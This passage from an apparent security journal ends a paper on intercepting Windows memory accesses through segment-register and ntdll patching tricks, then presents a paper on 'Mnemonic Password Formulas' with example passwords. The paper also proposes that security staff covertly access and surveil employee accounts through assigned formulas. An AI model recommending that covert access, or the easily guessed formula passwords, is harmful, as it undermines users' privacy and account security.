alter the segment registers for new threads, the DLL_THREAD_ATTACH notification
can be used. Once all threads have had their DS and ES segment registers
updated, memory references will immediately begin causing access violation
exceptions.
When these access violation exceptions are passed to the vectored exception
handler, appropriate steps must be taken to restore the DS and ES segment
registers to a valid segment selector, such as 0x23. This is accomplished by
updating the SegDs and SegEs segment registers in the CONTEXT structure that
is passed in association with an exception. In addition to updating these
segment registers, the trap flag (0x100) must also be set in the EFlags
register so that the DS and ES segment registers can be restored to the null
selector in order to trap subsequent memory accesses. Setting the trap flag
will lead to a single step exception after the instruction that generated the
access violation executes. When the single step exception is received, the
SegDs and SegEs segment registers can be restored to the null selector.
These few steps capture the majority of the implementation, but there is a
specific Windows nuance that must be handled in order for this to work right.
When the Windows kernel returns to a user-mode process after a system call has
completed, it restores the DS and ES segment selectors to their normal value
of 0x23. The problem with this is that without some way to reset the segment
registers to the null selector after a system call returns, there is no way to
continue to track memory accesses after a system call. Fortunately, there is
a relatively painless way to reset the segment registers after a system call
returns. On Windows XP SP2 and more recent versions of Windows, the kernel
determines where to transfer control to after a system call returns by looking
at the function pointer stored in the shared user data memory mapping.
Specifically, the SystemCallReturn attribute at 0x7ffe0304 holds a pointer to
a location in ntdll that typically contains just a ret instruction as shown
below:
0:001> u poi(0x7ffe0304)
ntdll!KiFastSystemCallRet:
7c90eb94 c3 ret
7c90eb95 8da42400000000 lea esp,[esp]
7c90eb9c 8d642400 lea esp,[esp]
Replacing this single ret instruction with code that resets the DS and ES
registers to the null selector followed by a ret instruction is enough to make
it possible to continue to trap memory accesses after a system call returns.
However, this replacement code should not take these steps if a system call
occurs in the context of the exception dispatcher, as this could lead to a
nesting issue if anything in the exception dispatcher references memory, which
is very likely.
An implementation of this approach is included with the source code provided
along with this paper.
2.3.3) Considerations
There are a few considerations that should be noted about this approach. On
the positive side, this approach is unique when compared to the others
described in this paper due to the fact that, in principle, it should be
possible to use it to trap memory accesses in kernel-mode, although it is
expected that the implementation may be much more complicated. This approach
is also much simpler than the other approaches in that it requires far less
code. While these are all good things, there are some negative considerations
that should also be pointed out. These are enumerated below:
1. Will not work on x64
The segmentation approach described in this section will not work on x64
due to the fact that the DS, ES, and even SS segment selectors are
effectively ignored when the processor is in 64-bit mode.
2. Significant performance overhead
Like many of the other approaches, this one also suffers from significant
performance overhead involved in having to take a GP and DB fault for
every address reference. This approach could be further optimized by
creating a custom LDT entry (using NtSetLdtEntries) that describes a
region whose base address is 0 and length is n where n is just below the
address of the region(s) that should be monitored. This would have the
effect of allowing memory accesses to succeed within the lower portion of
the address space and fail in the higher portion (which is being
monitored). It's important to note that the base address of the LDT entry
must be zero. This is problematic since most of the regions that one
would like to monitor (heap) are allocated low in the address space. It
would be possible to work around this issue by having
NtAllocateVirtualMemory allocate using MEM_TOP_DOWN.
3. Requires a disassembler
Unfortunately, this approach also requires the use of a disassembler in
order to extract the effective address that caused the access violation
exception to occur. This is necessary because general protection faults
that occur due to a segment selector issue generate exception records that
flag the fault address as being 0xffffffff. This makes sense in the
context that without a valid segment selector, there is no way to
accurately calculate the effective address. The use of a disassembler
means that the code is inherently more complicated than it would otherwise
need to be. There may be some way to craft a special LDT entry that would
still make it possible to determine the address that caused the fault, but
the author has not investigated this.
3) Potential Uses
The ability to intercept an application's memory accesses is an interesting
concept, but on its own it is of little use beyond simple statistical and visual analysis.
Even though this is the case, the data that can be collected by analyzing
memory access behavior can make it possible to perform much more extensive
forms of dynamic binary analysis. This section will give a brief introduction
to some of the hypothetical areas that might benefit from being able to
understand the memory access behavior of an application.
3.1) Data Propagation
Being able to gain knowledge about the way that data propagates throughout an
application can provide extremely useful insights. For example, understanding
data propagation can give security researchers an idea of the areas of code
that are affected, either directly or indirectly, by a buffer that is received
from a network socket. In this context, having knowledge about areas affected
by data would be much more valuable than simply understanding the code paths
that are taken as a result of the buffer being received. Though the two may
seem closely related, the areas of code affected by a buffer that is received
should actually be restricted to a subset of the overall code paths taken.
Even if understanding data propagation within an application is beneficial, it
may not be clear exactly how analyzing memory access behavior could make this
possible. To understand how this might work, it's best to think of memory
access in terms of its two basic operations: read and write. In the course of
normal execution, any instruction that reads from a location in memory can be
said to be dependent on the last instruction that wrote to that location.
When an instruction writes to a location in memory, it can be said that any
instructions that originally wrote to that location no longer have claim over
it. Using these simple concepts, it is possible to build a dependency graph
that shows how areas of code become dependent on one another in terms of a
reader/writer relationship. This dependency graph would be dynamic and would
change as a program executes just the same as the data propagation within an
application would change.
At this point in time, the author has developed a very simple implementation
based on the DBI strategy outlined in this paper. The current implementation
is in need of further refinement, but it is capable of showing reader/writer
relationships as the program executes. This area is ripe for future research.
3.2) Memory Access Isolation
From a visualization standpoint, it might be interesting to be able to show
with what degrees of code-level isolation different regions of memory are
accessed. For example, being able to show what areas of code touch individual
heap allocations could provide interesting insight into the containment model
of an application that is being analyzed. This type of analysis might be able
to show how well designed the application is by inferring code quality based
on the average number of areas of code that make direct reference to unique
heap allocations. Since this concept is a bit abstract, it might make sense
to discuss a more concrete example.
One example might involve an object-oriented C++ application that contains
multiple classes such as Circle, Shape, Triangle, and so on. In the first
design, the application allows classes to directly access the attributes of
instances. In the second design, the application forces classes to reference
attributes through public getters and setters. Using memory access behavior
to identify code-level isolation, the first design might be seen as a poor
design due to the fact that there will be many code locations where unique
heap allocations (class instances) have the contents of their memory accessed
directly. The second design, on the other hand, might be seen as a more
robust design due to the fact that the unique heap allocations would be
accessed by fewer places (the getters and setters).
It may actually be the case that there's no way to draw a meaningful
conclusion by analyzing code-level isolation of memory accesses. One specific
case that was raised to the author involved how the use of inlining or
aggressive compiler optimizations might incorrectly indicate a poor design.
Even though this is likely true, there may be some knowledge that can be
obtained by researching this further. The author is not presently aware of an
implementation of this concept but would love to be made aware if one exists.
3.3) Thread Data Consistency
Programmers familiar with the pains of thread deadlocks and thread-related
memory corruption should be well aware of how tedious these problems can be to
debug. By analyzing memory access behavior in conjunction with some
additional variables, it may be possible to make determinations as to whether
or not a memory operation is being made in a thread safe manner. At this
point, the author has not defined a formal approach that could be taken to
achieve this, but a few rough ideas have been identified.
The basic idea behind this approach would be to combine memory access behavior
with information about the thread that the access occurred in and the set of
locks that were acquired when the memory access occurred. Determining which
locks are held can be as simple as inserting instrumentation code into the
routines that are used to acquire and release locks at runtime. When a lock
is acquired, it can be pushed onto a thread-specific stack. When the lock is
released, it can be removed. The nice thing about representing locks as a
stack is that in almost every situation, locks should be acquired and released
in symmetric order. Acquiring and releasing locks asymmetrically can quickly
lead to deadlocks and therefore can be flagged as problematic.
Determining data consistency is quite a bit trickier, however. An analysis
library would need some means of historically tracking read and write access
to different locations in memory. Still, determining what might be a data
consistency issue from this historical data is challenging. One example of a
potential data consistency issue might be if two writes occur to a location in
memory from separate threads without a common lock being acquired between the
two threads. This isn't guaranteed to be problematic, but it is at the very
least indicative of a potential problem. Indeed, it's likely that many
other types of data consistency examples exist that may be possible to capture
in relation to memory access, thread context, and lock ownership.
Even if this concept can be made to work, the very fact that it would be a
runtime solution isn't a great thing. It may be the case that code paths that
lead to thread deadlocks or thread-related corruption are only executed rarely
and are hard to coax out. Regardless, the author feels like this represents
an interesting area of future research.
4) Previous Work
The ideas described in this paper benefit greatly from the concepts
demonstrated in previous works. The memory mirroring concept described in 2.2
draws heavily from the PaX team's work relating to their VMA mirroring and
software-based non-executable page implementations[8]. Oded Horovitz provided an
implementation of the paging approach for Windows and applied it to
application security[4]. In addition, there have been other examples that use
concepts similar to those described by PaX to achieve additional results, such
as OllyBone, ShadowWalker, and others[10, 9]. The use of DBI in 2.1 for
memory analysis is facilitated by the excellent work that has gone into
DynamoRIO, Valgrind, and indeed all other DBI frameworks[3, 11].
It should be noted that if one is strictly interested in monitoring writes to
a memory region, Windows provides a built-in feature known as a write watch.
When allocating a region with VirtualAlloc, the MEM_WRITE_WATCH flag can be set.
This flag tells the kernel to track writes that occur to the region. These
writes can be queried at a later point in time using GetWriteWatch[6].
It is also possible to use guard pages and other forms of page protection,
such as PAGE_NOACCESS, to intercept memory access to a page in user-mode.
Pedram Amini's PyDbg supports the concept of memory breakpoints which are
implemented using guard pages[12]. This type of approach has two limitations
that are worth noting. The first limitation involves an inability to pass
addresses to kernel-mode that have had a memory breakpoint set on them (either
guard page or PAGE_NOACCESS). If this occurs it can lead to unexpected
behavior, such as by causing a system call to fail when referencing the
user-mode address. This would not trigger an exception in user-mode.
Instead, the system call would simply return STATUS_ACCESS_VIOLATION. As a
result, an application might crash or otherwise behave improperly. The second
limitation is that there may be consequences in multi-threaded environments
where memory accesses are missed.
5) Conclusion
The ability to analyze the memory access behavior of an application at runtime
can provide additional insight into how an application works. This insight
might include learning more about how data propagates, deducing the code-level
isolation of memory references, identifying potential thread safety issues,
and so on. This paper has described three strategies that can be used to
intercept memory accesses within an application at runtime.
The first approach relies on Dynamic Binary Instrumentation (DBI) to inject
instrumentation code before instructions that access memory locations. This
instrumentation code is then capable of obtaining information about the
address being referenced when instructions are executed.
The second approach relies on hardware paging features supported by the x86
and x64 architecture to intercept memory accesses. This works by restricting
access to a virtual address range to kernel-mode access. When an application
attempts to reference a virtual address that has been marked as such, an
exception is generated that is then passed to the user-mode exception
dispatcher. A custom exception handler can then inspect the exception and
take the steps necessary to allow execution to continue gracefully after
having tracked the memory access.
The third approach uses the segmentation feature of the x86 architecture to
intercept memory accesses. It does this by loading the DS and ES segment
registers with the null selector. This has the effect of causing instructions
which implicitly use these registers to generate a general protection fault
when referencing memory. This fault results in an access violation exception
being generated that can be handled in much the same way as the hardware
paging approach.
It is hoped that these strategies might be useful to future research which
could benefit from collecting memory access information.
References
[1] AMD. AMD64 Architecture Programmer's Manual: Volume 2 System Programming.
http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf; accessed 5/2/2007.
[2] Bala, Duesterwald, Banerija. Transparent Dynamic Optimization.
http://www.hpl.hp.com/techreports/1999/HPL-1999-77.pdf; accessed 5/2/2007.
[3] Hewlett-Packard, MIT. DynamoRIO.
http://www.cag.lcs.mit.edu/dynamorio/; accessed 4/30/2007.
[4] Horovitz, Oded. Memory Access Detection.
http://cansecwest.com/core03/mad.zip; accessed 5/7/2007.
[5] Intel. Intel Architecture Software Developer's Manual Volume 3: System Programming.
http://download.intel.com/design/PentiumII/manuals/24319202.pdf; accessed 5/1/2007.
[6] Microsoft Corporation. GetWriteWatch.
http://msdn2.microsoft.com/en-us/library/aa366573.aspx; accessed 5/5/2007.
[7] Nethercote, Nicholas. Dynamic Binary Analysis and Instrumentation.
http://valgrind.org/docs/phd2004.pdf; accessed 5/2/2007.
[8] PaX Team. PAGEEXEC.
http://pax.grsecurity.net/docs/pageexec.txt; accessed 5/1/2007.
[9] Sparks, Butler. Shadow Walker: Raising the Bar for Rootkit Detection.
https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf; accessed 5/3/2007.
[10] Stewart, Joe. Ollybone.
http://www.joestewart.org/ollybone/; accessed 5/3/2007.
[11] Valgrind. Valgrind.
http://valgrind.org/; accessed 4/30/2007.
[12] Amini, Pedram. PaiMei.
http://pedram.redhive.com/PaiMei/docs/; accessed 5/10/2007.
Mnemonic Password Formulas
I)ruid, C²ISSP
druid@caughq.org
http://druid.caughq.org
5/2007
Abstract
The current information technology landscape is cluttered with a large
number of information systems that each have their own individual
authentication schemes. Even with single sign-on and multi-system
authentication methods, systems within disparate management domains
are likely to be utilized by users of various levels of involvement
within the landscape as a whole. Due to this complexity and the
abundance of authentication requirements, many users are required to
manage numerous credentials across various systems. This has given rise to
many different insecurities relating to the selection and management of
passwords. This paper details a subset of issues facing users and managers of
authentication systems involving passwords, discusses current approaches to
mitigating those issues, and finally introduces a new method for password
management and recall termed Mnemonic Password Formulas.
1) The Problem
1.1) Many Authentication Systems
The current information systems landscape is cluttered with individual
authentication systems. Even though many systems existing in a distinct
management domain utilize single sign-on as well as multi-system
authentication mechanisms, multiple systems within disparate management
domains are likely to be utilized regularly by users. Even users at the most
casual level of involvement in information systems can be expected to
interface with half a dozen or more individual authentication systems within
a single day. On-line banking systems, corporate intranet web and database
systems, e-mail systems, and social networking web sites are a few of the many
systems that may require their own method of user authentication.
Due to the abundance of authentication systems, many end users are required to
manage the large numbers of passwords needed to authenticate with these
various systems. This issue has given rise to many common insecurities related
to selection and management of passwords.
In addition to the prevalence of insecurities in password selection and
management, advances in authentication and cryptography assemblages have
instigated a shift in attack methodologies against authentication systems.
While recent advances in computing power have made shorter passwords of
six characters or less (regardless of the complexity of their content)
vulnerable to cracking by brute force[4], common attack methodologies are moving
away from cryptanalytic and brute force methods against the password storage
or authentication system in favor of intelligently guessing passwords.
This intelligent guessing might involve optimized dictionary attacks and
user context guesses, attacks against other credentials required by the
authentication system such as key-cards and password token devices, and
attacks against the interaction between the user and the systems themselves.
Due to all of the aforementioned factors, the user's password is commonly the
weakest link in any given authentication system.
1.2) Managing Multiple Passwords
Two of the largest problems with password authentication relate directly to
the user and how the user manages passwords. First, when users are not allowed
to write down their passwords, they generally will choose easy to remember
passwords which are usually much easier to crack than complex passwords. In
addition to choosing weaker passwords, users are more likely to re-use
passwords across multiple authentication systems.
Users inevitably have a difficult time memorizing assigned random
passwords[4] as well as self-chosen passwords of a mandated higher level of
complexity. When allowed, they may write down their passwords in an insecure
location such as a post-it note stuck to their computer monitor or on a note
pad in their desk. Alternatively, they may store passwords securely, such as
a password encrypted file within a PDA. However, a user could just as easily
lose access to the password store. The user may forget the password to the
encrypted file, or the PDA could be lost or stolen. In this situation, the end
result would require some administrative interaction in the form of issuing a
password reset.
1.3) Poor Password Selection
When left to their own devices, users generally do not choose complex
passwords[4] and tend to choose easy to crack dictionary words because they
are easy to remember. Occasionally an attempt will be made at complexity by
concatenating two words together or adding a number. In many cases, the word
or words chosen will also be related to, or within the context of, the user
themselves. This context might include things like a pet's name, phone
number, or a birth date.
These types of passwords require much less effort to crack than a brute-force
trial of the entire range of potential passwords. By using an optimized
dictionary attack method, common words and phrases are tried first which
usually leads to success. Due to the high success rate of this method, most
modern attacks on authentication systems target guessing the password first
before attempting to brute-force the password or launch an in-depth attack on
the authentication system itself.
1.4) Failing Stupid
When a user cannot remember their password, likely because they have too many
passwords to remember or the password was forced to be too complex for them to
remember, many authentication systems provide a mechanism that the author has
termed ``failing stupid.''
When the user ``fails stupid,'' they are asked a reminder question which is
usually extremely easy for them to answer. If answered correctly, users are
presented with an option to either reset their password, have it e-mailed to
them, or perform some other password recovery method. When this type of
recovery method is available, it effectively reduces the security of the
authentication system from the strength of the password to the strength of a
simple question. The answer to this question might even be obtainable through
public information.
1.4.1) Case Study: Paris Hilton Screwed by Dog
A well publicized user context attack[2] was recently executed against the
Hollywood celebrity Paris Hilton in which her cellular phone was compromised.
The account password recovery question that she selected for use with her
cellular provider's web site was "What is your favorite pet's name?" Many fans
can most likely recollect from memory the answer to this question, not to
mention fan web sites, message boards, and tabloids that likely have this
information available to anyone that wishes to gather it. The attacker simply
"failed stupid" and reset Hilton's online account password which then allowed
access to her cellular device and its data.
2) Existing Approaches
2.1) Write Down Passwords
During the AusCERT 2005 information security conference, Jesper Johansson,
Senior Program Manager for Security Policy at Microsoft, suggested[2] reversing
decades of information security best practice of not writing down passwords.
He claimed that the method of password security wherein users are prohibited
from writing down passwords is absolutely wrong. Instead, he advocated
allowing users to write down their passwords. The reasoning behind his claim
is an attempt at solving one of the problems mentioned previously: when users
are not allowed to write down their passwords they tend to choose easy to
remember (and therefore easy to crack) passwords. Johansson believes that
allowing users to write down their passwords will result in more complex
passwords being used.
While Mr. Johansson correctly identifies some of the problems of password
security, his approach to solving these conundrums is not only short-sighted,
but also noncomprehensive. His solution addresses users having to remember
multiple complex passwords, but also creates the aforementioned insecure
scenarios regarding written passwords, which are inherently less physically
secure and prone to require administrative resets due to loss.
2.2) Mnemonic Passwords
A mnemonic password is a password that is easily recalled by utilizing a
memory trick such as constructing passwords from the first letters of easily
remembered phrases, poems, or song lyrics. An example includes using the
first letters of each word in a phrase, such as: "Jack and Jill went up the
hill," which results in the password "JaJwuth". For mnemonic passwords to be
useful, the phrase must be easy for the user to remember.
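The first-letter construction above can be expressed as a one-line transformation (an illustrative sketch, not part of the original text):

```python
def mnemonic_password(phrase):
    """Build a mnemonic password from the first letter of each word."""
    return "".join(word[0] for word in phrase.split())

print(mnemonic_password("Jack and Jill went up the hill"))  # -> JaJwuth
```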
Previous research has shown[5] that passwords built from phrase recollection like
the example above yield passwords with complexity akin to true random
character distribution. Mnemonic passwords share a weakness with regular
passwords in that users may reuse them across multiple authentication systems.
Such passwords are also commonly created using well known selections of text
from famous literature or music lyrics. Password cracking dictionaries have
been developed that contain many of these common mnemonics.
2.3) More Secure Mnemonic Passwords
More Secure Mnemonic Passwords[1] (MSMPs), are passwords that are derived from
simple passwords which the user will remember with ease, however, they use
mnemonic substitutions to give the password a more complex quality.
``Leet-speaking'' a password is a simple example of this technique. For
example, converting the passwords ``beerbash'' and ``catwoman'' into
leet-speak would result in the passwords ``b33rb4sh'' and ``c@tw0m4n'',
respectively.
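A leet-speak transformation can be sketched as a character-substitution table. Such tables vary widely; the fixed map below (a->4, e->3, o->0) is just one assumed choice, so its output for "catwoman" differs slightly from the mixed substitutions shown above:

```python
LEET_MAP = {"a": "4", "e": "3", "o": "0"}  # one of many possible tables

def leetify(password, table=LEET_MAP):
    """Apply a fixed character-substitution table to a simple password."""
    return "".join(table.get(c, c) for c in password)

print(leetify("beerbash"))  # -> b33rb4sh
print(leetify("catwoman"))  # -> c4tw0m4n
```

Note that the determinism which makes such a map easy to remember is exactly what makes it easy to encode into a cracking dictionary.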
A unique problem of MSMPs is that not all passwords can be easily transformed
which limits either the choice of available passwords or the password's
seemingly complex quality. MSMPs also rely on permutations of underlying
dictionary words or sets of words which are easy to remember. Various cracking
dictionaries have been developed to attack specific methods of permutations
such as the "leet-speak" method mentioned above. As with mnemonic passwords,
these passwords might be reused across multiple authentication systems.
2.4) Pass Phrases
Pass phrases[4] are essentially what is used as the root of a mnemonic password.
They are easier to remember and much longer which results in a password being
much more resilient to attack by brute force. Pass phrases tend to be much
more complex due to the use of upper and lower case characters, white-space
characters, as well as special characters like punctuation and numbers.
However, pass phrases have their own sets of problems. Many authentication
systems do not support lengthy authentication tokens, thus resulting in pass
phrases that are not consistently usable. Like the aforementioned methods,
the same pass phrase may be reused across multiple authentication systems.
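The brute-force resilience of pass phrases can be quantified with a rough back-of-the-envelope calculation (the symbol-set sizes below are assumptions): an 8-character password drawn from the roughly 94 printable ASCII characters offers about 52 bits of search space, while even a 30-character phrase limited to lowercase letters and spaces offers about 143 bits.

```python
import math

# Assumed symbol sets: 94 printable ASCII characters vs. 26 lowercase letters + space
password_space = 94 ** 8       # 8-character "complex" password
passphrase_space = 27 ** 30    # 30-character lowercase-and-space passphrase

print(round(math.log2(password_space)))    # ~52 bits
print(round(math.log2(passphrase_space)))  # ~143 bits
```

This treats the phrase as a random symbol string; real phrases carry far less entropy per character, but the length advantage remains large.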
3) Mnemonic Password Formulas
3.1) Definition
A Mnemonic Password Formula, or MPF, is a memory technique utilizing a
predefined, memorized formula to construct a password on the fly from various
context information that the user has available.
3.2) Properties
Given a well designed MPF, the resultant password should have the following
properties:
- A seemingly random string of characters
- Long and very complex, therefore difficult to crack via brute force
- Easy to reconstruct by a user with knowledge of only the formula,
themselves, and the target authentication system
- Unique for each user, class of access, and authenticating system
3.3) Formula Design
3.3.1) Syntax
For the purposes of this paper, the following formula syntax will be used:
- <X> : An element, where <X> is meant to be entirely replaced by something known as described by X.
- | : When used within an element's angle brackets (< and >), represents an OR value choice.
- All other characters are literal.
3.3.2) A Simple MPF
The following simple formula should be sufficient to demonstrate the MPF
concept. Given the authenticating user and the corresponding authenticating
system, a formula like that shown in the following example could be
constructed. This example formula contains two elements: the user and
the target system identified either by hostname or the most significant octet
of the IP address.
<user>!<hostname|lastoctet>
The above MPF would yield such passwords as:
- "druid!neo" for user druid at system neo.jpl.nasa.gov
- "intropy!intropy" for user intropy at system intropy.net
- "thegnome!nmrc" for user thegnome at system nmrc.org
- "druid!33" for user druid at system 10.0.0.33
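The simple MPF above can be sketched in Python. The heuristic for deciding whether the system identifier is an IP address is an assumption; the formula itself does not prescribe one:

```python
def simple_mpf(user, system):
    """<user>!<hostname|lastoctet>"""
    parts = system.split(".")
    if all(part.isdigit() for part in parts):  # looks like an IP address
        suffix = parts[-1]                     # use the last octet
    else:
        suffix = parts[0]                      # use the hostname (first label)
    return user + "!" + suffix

print(simple_mpf("druid", "neo.jpl.nasa.gov"))  # -> druid!neo
print(simple_mpf("druid", "10.0.0.33"))         # -> druid!33
```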
This simple MPF schema creates fairly long, easy-to-remember passwords that
contain a special character. However, it does not yield very complex
passwords. A diligent attacker may include the target user and hostname as
some of the first combinations of dictionary words used in a brute force
attack against the password. Due to the fact that only the hostname or last
octet of the IP address is used as a component of the schema, passwords may
not be unique per system. If the same user has an account on two different web
servers, both with hostname "www", or two different servers with the same last
address octet value within two different sub-nets, the resultant passwords
will be identical. Finally, the passwords yielded are variable in length and
may not comply with a given system's password length policies.
3.3.3) A More Complex MPF
By modifying the simple MPF above, complexity can be improved. Given the
authenticating user and the authenticating system, an MPF with the following
components can be constructed:
<u>!<h|n>.<d,d,...|n,n,...>
The more complex MPF contains three elements: <u> represents the first letter
of the username, <h|n> represents the first letter of the hostname or first
number of the first address octet, and <d,d,...|n,n,...> represents the first
letters of the remaining domain name parts or first numbers of the remaining
address octets, concatenated together. This MPF also contains another special
character in addition to the exclamation mark, the period between the second
and third element.
The above MPF would yield such passwords as:
- "d!n.jng" for user druid at system neo.jpl.nasa.gov
- "i!i.n" for user intropy at system intropy.net
- "t!n.o" for user thegnome at system nmrc.org
- "d!1.003" for user druid at system 10.0.0.33
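Because this MPF takes the first character of every dot-separated part, hostnames and IP addresses can be handled uniformly. An illustrative sketch:

```python
def complex_mpf(user, system):
    """<u>!<h|n>.<d,d,...|n,n,...>"""
    firsts = [part[0] for part in system.split(".")]  # first letter/digit of each part
    return user[0] + "!" + firsts[0] + "." + "".join(firsts[1:])

print(complex_mpf("druid", "neo.jpl.nasa.gov"))  # -> d!n.jng
print(complex_mpf("druid", "10.0.0.33"))         # -> d!1.003
```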
The modified MPF contains two special characters which yields more complex
passwords, however, the passwords are still variable length and may not comply
with the authenticating system's password length policies. The example MPF is
also increasing in complexity and may not be easily remembered.
3.3.4) Design Goals
The ideal MPF should meet as many of the following design goals as possible:
- Contain enough elements and literals to always yield a minimum password
length
- Contain enough complex elements and literals such as capital letters and
special characters to yield a complex password
- Elements must be unique enough to yield a unique password per
authenticating system
- Must be easily remembered by the user
3.3.5) Layered Mnemonics
Due to the fact that MPFs can become fairly complex while attempting to meet
the first three design goals listed above, a second layer of mnemonic
properties can be applied to the MPF. The MPF, by definition, is a mnemonic
technique due to its property of allowing the user to reconstruct the password
for any given system by remembering only the MPF and having contextual
knowledge of themselves and the system. Other mnemonic techniques can be
applied to help remember the MPF itself. This second layer of mnemonics may
also be tailored to the user of the MPF.
Given the authenticating user and the authenticating system, an adequately
complex, long, and easy to remember MPF like the following could be
constructed:
<u>@<h|n>.<d|n>;
This MPF contains three elements: <u> represents the first letter of the
username, <h|n> represents the first letter of the hostname or first number of
the first address octet, and <d|n> represents the last letter of the domain
name suffix or last number of the last address octet. This MPF also contains
a third special character in addition to the at sign and the period: the
semicolon after the final element.
The above MPF would yield such passwords as:
- "d@n.v;" for user druid at system neo.jpl.nasa.gov
- "i@i.t;" for user intropy at system intropy.net
- "t@n.g;" for user thegnome at system nmrc.org
- "d@1.3;" for user druid at 10.0.0.33
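A sketch of the email-style MPF; taking the final element as the last character of the last dot-separated part covers both the domain-suffix and last-octet cases in one expression (an illustrative implementation choice, not prescribed by the formula):

```python
def email_mpf(user, system):
    """<u>@<h|n>.<d|n>;"""
    parts = system.split(".")
    return user[0] + "@" + parts[0][0] + "." + parts[-1][-1] + ";"

print(email_mpf("druid", "neo.jpl.nasa.gov"))  # -> d@n.v;
print(email_mpf("druid", "10.0.0.33"))         # -> d@1.3;
```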
Unlike the previously discussed MPFs, the one mentioned above employs a
secondary mnemonic technique by reading in a natural way and is thus easier
for a user to remember. The MPF can be read and remembered as ``user at host
dot domain,'' which is comparable to the structural format of an email address.
Also, a secondary mnemonic technique specific to the user of this MPF was used
by appending the literal semicolon character. This MPF was designed by a C
programmer who would naturally remember to terminate her passwords with
semicolons.
3.3.6) Advanced Elements
MPFs can be made even more complex through use of various advanced elements.
Unlike simple elements which are meant to be replaced entirely by some static
value like a username, first letter of a username, or some part of the
hostname, advanced elements such as repeating elements, variable elements, and
rotating or incrementing elements can be used to vastly improve the MPF's
output complexity. Note, however, that overuse of these types of elements may
cause the MPF to not meet design goal number four by making the MPF too
difficult for the user to remember.
- Repeating Elements
MPFs may yield longer passwords by repeating simple elements. For
example, an element such as the first letter of the hostname may be
used twice:
<u>@<h|n><h|n>.<d>;
Such repeating elements are not required to be sequential, and
therefore may be inserted at any point within the MPF.
- Variable Elements
MPFs can yield more complex passwords by including variable elements. For
example, the MPF designer can prepend the characters "p:" or "b:" to the
beginning of the formula to include an element indicating whether the target
system is a personal or a business system.
<p|b>:<u>@<h|n>.<d|n>;
To further expand this example, consider a user who performs system
administration work for multiple entities. In this case the variable
element being prepended could be the first letter of the system's managing
entity:
<x>:<u>@<h|n>.<d|n>;
<x> could be replaced by ``p'' for a personal system, ``E'' for a system
within Exxon-Mobil's management domain, or ``A'' for a system managed by
the Austin Hackers Association. Most of the elements used thus far are
relatively simple elements that derive their value from known contextual
information such as the user or system name; they differ only in how their
value changes when the MPF is applied to different systems. Variable
elements, by contrast, change value in relation to the class of access or
other factors outside the basic ``user/system'' context.
To illustrate this concept, using the same MPF for a super-user account and
an unprivileged user account on the same system may result in passwords that
differ only slightly. Including a variable element can help to mitigate this
similarity: prepending the characters ``0:'' or ``1:'' to the resultant
password to indicate super-user versus unprivileged access, respectively,
increases the password's complexity while also indicating the class of
access.
Variable elements are not required to appear at the beginning of the formula
as in the examples above; they can just as easily be appended or inserted
anywhere within the MPF.
- Rotating and Incrementing Elements
Rotating and incrementing elements can be included to assist in managing
password changes required to conform to password rotation policies. A
rotating element is one which rotates through a predefined list of values
such as "apple", "orange", "banana", etc. An incrementing element, such as
the one represented below by <#>, is derived from an open-ended linear
sequence of values to increment through, such as "1", "2", "3" or "one", "two",
"three". When a password rotation policy dictates that a password must be
changed, rotate or increment the appropriate elements:
<u>@<h|n>.<d|n>;<#>
The above MPF results in passwords like "d@c.g;1", "d@c.g;2", "d@c.g;3",
etc. To further illustrate this principle, consider the following MPF:
<u>@<h|n>.<d|n>;<fruit>
The above MPF, when used with the predefined list of fruit values mentioned
above, yields passwords like "d@c.g;apple", "d@c.g;orange", "d@c.g;banana",
etc.
The only additional pieces of information that the user must remember, other
than the MPF itself, are the predefined list of values in the rotating
element and the current value of the rotating or incrementing element.
In the case of rotating elements this list of values may potentially be
written down for easy reference without compromising the security of the
password itself. Lists may be further obscured by reusing values that are
already posted within the user's environment, such as a grocery list or a
list of company employees and their telephone extensions. In
the case of incrementing elements, knowledge of the current value should be
all that is required to determine the next value.
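A rotating element appended to an MPF-generated base password can be sketched as follows. The base "d@c.g;" is hypothetical (the hostname behind the text's examples is not given), and the fruit list is the memorized rotation list mentioned above:

```python
FRUITS = ["apple", "orange", "banana"]  # the memorized rotation list

def rotated_password(base, rotation_count, values=FRUITS):
    """Append the current rotating element; wraps around when the list is exhausted."""
    return base + values[rotation_count % len(values)]

for n in range(4):
    print(rotated_password("d@c.g;", n))
# -> d@c.g;apple, d@c.g;orange, d@c.g;banana, d@c.g;apple
```

On each mandated password change, the user only increments the rotation count; everything else is reconstructed from the MPF.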
3.4) Enterprise Considerations
Large organizations could use MPFs assigned to specific users to facilitate
dual-access to a user's accounts across the enterprise. If the enterprise's
Security Operations group assigns unique MPFs to its users, Security Officers
would then be able to access the user's accounts without intrusively modifying
the user's account or password. This type of management could be used for
account access when a user is absent or indisposed, shared account access among
multiple staff members or within an operational group, or even surveillance of
a suspected user by the Security Operations group.
3.5) Weaknesses
3.5.1) The ``Skeleton Key'' Effect
The most significant weakness of passwords generated by MPFs is that when the
formula becomes compromised, all passwords to systems for which the user is
using the respective MPF schema are potentially compromised. This situation is
no worse than a user simply using the same password on all systems. In fact,
it is significantly better due to the resultant passwords being individually
unique. When using a password generated by an MPF, the password should be
unique per system and ideally appear to be a random string of characters. In
order to compromise the formula, an attacker would likely have to crack a
significant number of passwords generated by the formula on different
systems before being able to identify the correlation between them.
3.5.2) Complexity Through Password Policy
A second weakness of MPF generated passwords is that without rotating or
incrementing elements, they are not very resilient to password expiration or
rotation policies. There exists a trade-off between increased password
security via expiring passwords and MPF complexity: the choice is either to
have both or neither. The more secure option is to use both; however, this
practice increases the complexity of the MPF, potentially causing it to not
meet design goal number four.
4) Conclusion
MPFs can effectively mitigate many of the existing risks of complex password
selection and management by users. However, their complexity and mnemonic
properties must be managed very carefully in order to achieve a comfortable
level of password security while also maintaining memorability. Users may
reintroduce many of the problems MPFs intend to solve if the formulas become
too complex to easily remember.
References
[1] Bugaj, Stephan Vladimir. More Secure Mnemonic-Passwords: User-Friendly Passwords for Real Humans
http://www.cs.uno.edu/Resources/FAQ/faq4.html
[2] Kotadia, Munir. Microsoft Security Guru: Jot Down Your Passwords
http://news.com.com/Microsoft+security+guru+Jot+down+your+passwords/2100-7355_3-5716590.html
[3] McWilliams, Brian. How Paris Got Hacked?
http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html
[4] Williams, Randall T. The Passphrase FAQ
http://www.iusmentis.com/security/passphrasefaq/
